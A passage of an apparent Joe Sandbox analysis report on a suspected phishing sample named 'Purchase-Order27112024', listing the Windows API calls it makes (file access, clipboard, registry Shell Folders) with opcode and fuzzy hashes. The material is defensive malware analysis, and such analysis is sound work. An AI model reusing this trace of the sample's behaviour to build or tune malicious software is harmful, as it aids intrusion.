                                                                                                      • FreeLibrary.KERNELBASE(00000000), ref: 0044DEB6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FreeLibrary
                                                                                                      • String ID:
                                                                                                      • API String ID: 3664257935-0
                                                                                                      • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                      • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                      • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                      • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                      APIs
                                                                                                      • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseFind
                                                                                                      • String ID:
                                                                                                      • API String ID: 1863332320-0
                                                                                                      • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                      • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                      • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                      • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                      APIs
                                                                                                      • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Open
                                                                                                      • String ID:
                                                                                                      • API String ID: 71445658-0
                                                                                                      • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                      • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                                      • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                      • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                                      APIs
                                                                                                      • GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AttributesFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 3188754299-0
                                                                                                      • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                      • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                      • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                      • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b24af7433d330108988894de74f75be26998b58131ab4cc11d8f9b1f19dcffda
                                                                                                      • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                      • Opcode Fuzzy Hash: b24af7433d330108988894de74f75be26998b58131ab4cc11d8f9b1f19dcffda
                                                                                                      • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004095FC
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                        • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                        • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                        • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 3655998216-0
                                                                                                      • Opcode ID: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                                                                                      • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                      • Opcode Fuzzy Hash: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                                                                                      • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00445426
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                        • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                        • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                      • String ID:
                                                                                                      • API String ID: 1828521557-0
                                                                                                      • Opcode ID: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                                                      • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                      • Opcode Fuzzy Hash: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                                                      • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                        • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                      • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??2@FilePointermemcpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 609303285-0
                                                                                                      • Opcode ID: 56af1d3d616a015a3ecb908bea2399ecc0b12673b9d22b9fdb7fca1b43f88111
                                                                                                      • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                                      • Opcode Fuzzy Hash: 56af1d3d616a015a3ecb908bea2399ecc0b12673b9d22b9fdb7fca1b43f88111
                                                                                                      • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                                      APIs
                                                                                                        • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                      • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                      • String ID:
                                                                                                      • API String ID: 2136311172-0
                                                                                                      • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                      • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                      • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                      • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??2@??3@
                                                                                                      • String ID:
                                                                                                      • API String ID: 1936579350-0
                                                                                                      • Opcode ID: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                                                                                      • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                      • Opcode Fuzzy Hash: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                                                                                      • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: free
                                                                                                      • String ID:
                                                                                                      • API String ID: 1294909896-0
                                                                                                      • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                      • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                      • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                      • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: free
                                                                                                      • String ID:
                                                                                                      • API String ID: 1294909896-0
                                                                                                      • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                      • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                      • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                      • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: free
                                                                                                      • String ID:
                                                                                                      • API String ID: 1294909896-0
                                                                                                      • Opcode ID: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                                                                                      • Instruction ID: 5e082493cfe38c59748d9de5a46a99a47989c0e105afa31b953e1adb18ef7a34
                                                                                                      • Opcode Fuzzy Hash: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                                                                                      • Instruction Fuzzy Hash: 17900282455501105C0425755C06505110808A313A376074A7032955D1CE188060601D
                                                                                                      APIs
                                                                                                      • EmptyClipboard.USER32 ref: 004098EC
                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                      • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                      • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                      • GetLastError.KERNEL32 ref: 0040995D
                                                                                                      • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                      • GetLastError.KERNEL32 ref: 00409974
                                                                                                      • CloseClipboard.USER32 ref: 0040997D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                      • String ID:
                                                                                                      • API String ID: 3604893535-0
                                                                                                      • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                      • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                                      • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                      • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                                      APIs
                                                                                                      • EmptyClipboard.USER32 ref: 00409882
                                                                                                      • wcslen.MSVCRT ref: 0040988F
                                                                                                      • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                                      • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                      • CloseClipboard.USER32 ref: 004098D7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                      • String ID:
                                                                                                      • API String ID: 1213725291-0
                                                                                                      • Opcode ID: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                                                                                      • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                                      • Opcode Fuzzy Hash: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                                                                                      • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32 ref: 004182D7
                                                                                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                      • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                      • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                      • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                      • free.MSVCRT ref: 00418370
                                                                                                        • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7622DF80,?,0041755F,?), ref: 00417452
                                                                                                        • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                      • String ID: OsError 0x%x (%u)
                                                                                                      • API String ID: 2360000266-2664311388
                                                                                                      • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                      • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                      • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                      • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??2@??3@memcpymemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 1865533344-0
                                                                                                      • Opcode ID: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                                                                                      • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                                                                      • Opcode Fuzzy Hash: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                                                                                      • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                                                      APIs
                                                                                                      • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: NtdllProc_Window
                                                                                                      • String ID:
                                                                                                      • API String ID: 4255912815-0
                                                                                                      • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
